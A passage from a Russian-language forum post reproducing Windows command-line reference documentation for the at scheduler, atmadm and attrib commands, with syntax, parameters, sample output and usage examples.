(^) перед символом перенаправления независимо от того, используется ли at в командной строке или в пакетном файле. Например, чтобы перенаправить вывод в файл Output.txt, введите:</p> <p>&#160; &#160; &#160; at 14:45 c:\test.bat ^&gt;c:\output.txt</p> <p>&#160; &#160; &#160; Текущим каталогом для выполнения запланированных команд является системный_корневой_каталог.<br />&#160; &#160; * Изменение системного времени</p> <p>&#160; &#160; &#160; Если системное время изменено после планирования вызова команд с помощью at, синхронизируйте планировщик команды at с измененным системным временем, вызвав at без параметров.<br />&#160; &#160; * Сохранение запланированных команд</p> <p>&#160; &#160; &#160; Запланированные команды сохраняются в реестре. Таким образом, запланированные задания не будут потеряны при перезапуске службы расписаний.<br />&#160; &#160; * Подключение к сетевым дискам</p> <p>&#160; &#160; &#160; Не указывайте перенаправленные диски для запланированных заданий, требующих доступ к сети. Служба расписаний может не получить доступа к таким дискам или диски могут оказаться неподключенными, если другой пользователь окажется подключенным к системе в момент выполнения запланированного задания. Вместо этого, используйте пути UNC при работе с запланированными заданиями. Например:</p> <p>&#160; &#160; &#160; at 13:00 my_backup \\server\share</p> <p>&#160; &#160; &#160; Запрещается использовать следующий синтаксис, где x: — подключение, устанавливаемое пользователем:</p> <p>&#160; &#160; &#160; at 13:00 my_backup x:</p> <p>&#160; &#160; &#160; Если с помощью at запланирована команда, использующая буквенное обозначение диска для подключения к общему каталогу, то после выполнения команды должна быть запланирована команда at, отключающая данный диск. В противном случае, имя, присвоенное данному диску, будет недоступно в командной строке.</p> <p>Примеры</p> <p>Для вывода списка команд, которые будут выполнены на сервере Marketing, можно использовать следующую команду:<br />at \\marketing</p> <p>Для получения дополнительных сведений о команде с идентификатором 3 на сервере Corp требуется ввести следующую команду:<br />at \\corp 3</p> <p>Для запуска команды net share на сервере Corp в 8:00 и перенаправления вывода на сервер Maintenance в общий каталог Reports в файл Corp.txt требуется ввести следующую команду:<br />at \\corp 08:00 cmd /c &quot;net share reports=d:\marketing\reports &gt;&gt; \\maintenance\reports\corp.txt&quot;</p> <p>Чтобы записывать на магнитную ленту резервную копию жесткого диска сервера Marketing в полночь через каждые пять дней, создайте пакетный файл Archive.cmd, содержащий команды резервирования, а затем запланируйте запуск пакетного файла, введя:<br />at \\marketing 00:00 /every:5,10,15,20,25,30 archive</p> <p>Чтобы отменить вызов всех команд, запланированных на данном сервере, необходимо очистить расписание команды at следующим образом:<br />at /delete</p> <p>Чтобы запустить команду, которая не является исполняемым файлом, введите перед ней cmd /c для загрузки программы Cmd.exe следующим образом:<br />cmd /c dir &gt; c:\test.out</p> <p>========================================================================================<br />Atmadm</p> <p>Контроль подключений и адресов, зарегистрированных диспетчером вызовов ATM в сетях с асинхронным режимом передачи (ATM). Команда atmadm может быть использована для вывода статистики входящих и исходящих вызовов ATM-адаптеров. Вызванная без параметров команда atmadm отображает статистику для контроля состояния активных ATM-подключений.<br />Синтаксис</p> <p>atmadm [/c][/a] [/s]<br />Параметры</p> <p>/c<br />&#160; &#160; Вывод сведений о вызовах для всех текущих подключений к сетевому ATM-адаптеру, установленному на компьютере.<br />/a<br />&#160; &#160; Вывод зарегистрированного ATM-адреса точек доступа к сетевым службам (Network Service Access Point, NSAP) для каждого адаптера, установленного на компьютере.<br />/s<br />&#160; &#160; Вывод статистики для контроля состояния активных ATM-подключений.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Примеры<br />Вывод сведений о вызовах</p> <p>Чтобы вывести сведения о вызовах для всех текущих подключений к сетевому ATM-адаптеру, установленному на компьютере, введите:</p> <p>atmadm /c</p> <p>Сведения, полученные в результате выполнения команды atmadm /c, будут иметь следующий вид:</p> <p>Статистика диспетчера звонков ATM</p> <p>ATM-подключения для интерфейса : [009] Адаптер Olicom ATM PCI 155</p> <p>&#160; &#160;Подключение&#160; VPI/VCI&#160; &#160;Удаленный адрес/<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Параметры носителя (измеряются в байт/с)<br />&#160; &#160;In&#160; PMP SVC&#160; &#160; 0/193&#160; &#160;47000580FFE1000000F21A2E180020481A2E180B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 0,Avg 0,MaxSdu 1516<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 16953936,Avg 16953936,MaxSdu 1516<br />&#160; &#160;Out P-P SVC&#160; &#160; 0/192&#160; &#160;47000580FFE1000000F21A2E180020481A2E180B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 16953936,Avg 16953936,MaxSdu 1516<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 16953936,Avg 16953936,MaxSdu 1516<br />&#160; &#160;In&#160; PMP SVC&#160; &#160; 0/191&#160; &#160;47000580FFE1000000F21A2E180020481A2E180B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 0,Avg 0,MaxSdu 1516<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 16953936,Avg 16953936,MaxSdu 1516<br />&#160; &#160;Out P-P SVC&#160; &#160; 0/190&#160; &#160;47000580FFE1000000F21A2E180020481A2E180B<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 16953936,Avg 16953936,MaxSdu 1516<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 16953936,Avg 16953936,MaxSdu 1516<br />&#160; &#160;In&#160; P-P SVC&#160; &#160; 0/475&#160; &#160;47000580FFE1000000F21A2E180000C110081501<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 16953984,Avg 16953984,MaxSdu 9188<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 16953936,Avg 16953936,MaxSdu 9188<br />&#160; &#160;Out PMP SVC&#160; &#160; 0/194&#160; &#160;47000580FFE1000000F21A2E180000C110081501 (0)<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 16953984,Avg 16953984,MaxSdu 9180<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 0,Avg 0,MaxSdu 0<br />&#160; &#160;Out P-P SVC&#160; &#160; 0/474&#160; &#160;4700918100000000613E5BFE010000C110081500<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 16953984,Avg 16953984,MaxSdu 9188<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 16953984,Avg 16953984,MaxSdu 9188<br />&#160; &#160;In&#160; PMP SVC&#160; &#160; 0/195&#160; &#160;47000580FFE1000000F21A2E180000C110081500<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Tx:UBR,Peak 0,Avg 0,MaxSdu 0<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Rx:UBR,Peak 16953936,Avg 16953936,MaxSdu 9180</p> <p>В следующей таблице содержится описание каждого элемента из приведенного вывода команды atmadm /c.<br />Тип данных Изображение на экране Описание<br />Сведения о подключении In/Out Направление вызова. In — вызов сетевого ATM-адаптера другим устройством. Out — вызов другого устройства сетевым ATM-адаптером.<br /> PMP Вызов из одной точки нескольких точек.<br /> P-P Прямой вызов.<br /> SVC Соединение по переключаемому виртуальному каналу.<br /> PVC Соединение по постоянному виртуальному каналу.<br />Сведения о VPI/VCI VPI/VCI Виртуальный путь и виртуальный канал входящего и исходящего вызовов.<br />Удаленный адрес/Параметры носителя 47000580FFE1000000F21A2E180000C110081500 Адрес NSAP вызывающего (In) или вызываемого (Out) устройства ATM.<br /> Tx Параметр Tx включает три следующих элемента.</p> <p>&#160; &#160; * Указанный или используемый по умолчанию тип скорости передачи (UBR — неуказанная, CBR — постоянная, VBR — переменная или ABR — доступная скорость передачи).<br />&#160; &#160; * Указанная или используемая по умолчанию скорость линии.<br />&#160; &#160; * Указанный размер единицы данных службы (SDU).</p> <p> Rx Параметр Rx включает три следующих элемента.</p> <p>&#160; &#160; * Указанный или используемый по умолчанию тип скорости передачи (UBR — неуказанная, CBR — постоянная, VBR — переменная или ABR — доступная скорость передачи).<br />&#160; &#160; * Указанная или используемая по умолчанию скорость линии.<br />&#160; &#160; * Указанный размер единицы данных службы (SDU).</p> <p>Вывод всех зарегистрированных адресов</p> <p>Чтобы вывести зарегистрированные ATM-адреса точек доступа к сетевым службам (Network Service Access Point, NSAP) для каждого адаптера, установленного на компьютере, введите:</p> <p>atmadm /a</p> <p>Сведения, полученные в результате выполнения команды atmadm /a, будут иметь следующий вид:</p> <p>Статистика диспетчера звонков ATM</p> <p>Адреса ATM для интерфейса : [009] Адаптер Olicom ATM PCI 155</p> <p>47000580FFE1000000F21A2E180000C110081500</p> <p>Вывод статистики</p> <p>Чтобы вывести статистику для контроля состояния активных ATM-подключений, введите:</p> <p>atmadm /s</p> <p>Сведения, полученные в результате выполнения команды atmadm /s, будут иметь следующий вид:</p> <p>Статистика диспетчера звонков ATM</p> <p>Статистика диспетчера вызовов ATM для интерфейса : [009] Адаптер Olicom ATM PCI 155</p> <p> Текущие активные звонки&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; = 4<br /> Общее число успешных входных звонков&#160; &#160; &#160; &#160; &#160; &#160;= 1332<br /> Общее число успешных выходных звонков&#160; &#160; &#160; &#160; &#160; = 1297<br /> Число сбоев входных звонков&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; = 1<br /> Число сбоев выходных звонков&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;= 1<br /> Число звонков, прерванных удаленным абонентом&#160; = 1302<br /> Число звонков, прерванных локальным абонентом&#160; = 1323<br /> Послано сигнальных и ILMI-пакетов&#160; &#160; &#160; &#160; &#160; &#160; &#160; = 33655<br /> Получено сигнальных и ILMI-пакетов&#160; &#160; &#160; &#160; &#160; &#160; &#160;= 34989</p> <p>В следующей таблице содержится описание каждого элемента из приведенного вывода команды atmadm /s.<br />Статистика диспетчера вызовов Описание<br />Текущие активные звонки Активные вызовы ATM-адаптера, установленного на компьютере.<br />Общее число успешных входных звонков Успешно полученные вызовы в сети с асинхронной передачей.<br />Общее число успешных выходных звонков Вызовы с данного компьютера, успешно выполненные на других ATM-устройствах в сети.<br />Число сбоев входных звонков Входящие вызовы, которым не удалось подключиться к компьютеру.<br />Число сбоев выходных звонков Исходящие вызовы, которым не удалось подключиться к другому устройству в сети.<br />Число звонков, прерванных удаленным абонентом Звонки, прерванные удаленным устройством в сети.<br />Число звонков, прерванных локальным абонентом Звонки, прерванные компьютером.<br />Послано сигнальных и ILMI-пакетов Количество пакетов интегрированного интерфейса локального управления (ILMI), отправленных коммутатору, к которому компьютер пытается подключиться.<br />Получено сигнальных и ILMI-пакетов Количество пакетов ILMI, полученных от коммутатора.</p> <p>========================================================================================<br />Attrib</p> <p>Позволяет просматривать, устанавливать или снимать атрибуты файла или каталога, такие как «Только чтение», «Архивный», «Системный» и «Скрытый». Выполненная без параметров команда attrib выводит атрибуты всех файлов в текущем каталоге.<br />Синтаксис</p> <p>attrib [{+r|-r}] [{+a|-a}] [{+s|-s}] [{+h|-h}] [[диск:][путь] имя_файла] [/s[/d]]<br />Параметры</p> <p>+r<br />&#160; &#160; Установка атрибута «Только чтение».<br />-r<br />&#160; &#160; Снятие атрибута «Только чтение».<br />+a<br />&#160; &#160; Установка атрибута «Архивный».<br />-a<br />&#160; &#160; Снятие атрибута «Архивный».<br />+s<br />&#160; &#160; Установка атрибута «Системный».<br />-s<br />&#160; &#160; Снятие атрибута «Системный».<br />+h<br />&#160; &#160; Установка атрибута «Скрытый».<br />-h<br />&#160; &#160; Снятие атрибута «Скрытый».<br />[диск:][путь] имя_файла<br />&#160; &#160; Задание местонахождения и имени каталога, файла или набора файлов, атрибуты которых требуется просмотреть или изменить. Для обработки группы файлов допускается применение подстановочных знаков (? и *) в параметре имя_файла.<br />/s<br />&#160; &#160; Выполнение команды attrib и всех параметров командной строки для соответствующих файлов в текущем каталоге и всех его подкаталогах.<br />/d<br />&#160; &#160; Выполнение команды attrib и всех параметров командной строки для каталогов.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Работа с группами файлов</p> <p>&#160; &#160; &#160; Для просмотра или изменения атрибутов группы файлов можно воспользоваться подстановочными знаками (? и *) в параметре имя_файла. Для изменения атрибутов системных или скрытых файлов вначале требуется снять соответствующие атрибуты.<br />&#160; &#160; * Использование атрибута «Архивный»</p> <p>&#160; &#160; &#160; Атрибут «Архивный» (т. е. параметр +a) используется для отметки файлов, измененных со времени последнего резервного копирования. Этот атрибут используется в команде xcopy. Для получения дополнительных сведений об атрибуте «Архивный» и команде xcopy щелкните ссылку &quot;&quot;.<br />&#160; &#160; * Команда attrib с другими параметрами доступна в консоли восстановления.</p> <p>Примеры</p> <p>Чтобы вывести атрибуты файла News86, расположенного в текущем каталоге, введите следующую команду:</p> <p>attrib news86</p> <p>Чтобы назначить атрибут «Только чтение» файлу Report.txt, введите следующую команду:</p> <p>attrib +r report.txt</p> <p>Чтобы снять атрибут &quot;Только чтение&quot; с файлов в каталоге \Public\Jones на диске B и всех его подкаталогах, введите следующую команду:</p> <p>attrib -r b:\public\jones\*.* /s</p> <p>Предположим, что необходимо передать коллеге диск, содержащий файлы из текущего каталога диска A, за исключением файлов с расширением .bak. Поскольку для копирования файлов с установленным атрибутом «Архивный» может быть использована команда xcopy, необходимо установить этот атрибут для всех файлов, подлежащих копированию. Вначале установите атрибут «Архивный» для всех файлов на диске A, а затем снимите этот атрибут для файлов с расширением .bak. Например, введите следующую команду:</p> <p>attrib +a a:*.* attrib -a a:*.bak</p> <p>Теперь для копирования файлов с диска A на диск B воспользуйтесь командой xcopy. Запущенная с параметром /a команда xcopy скопирует только файлы с установленным атрибутом «Архивный». Например, введите следующую команду:</p> <p>xcopy a: b: /a</p> <p>Если требуется снять атрибут Архивный со скопированных файлов, воспользуетесь командой xcopy с параметром /m вместо /a. Например, введите следующую команду:</p> <p>xcopy a: b: /m </p> <p>Продолжение следует......</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:21:09 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=20#p20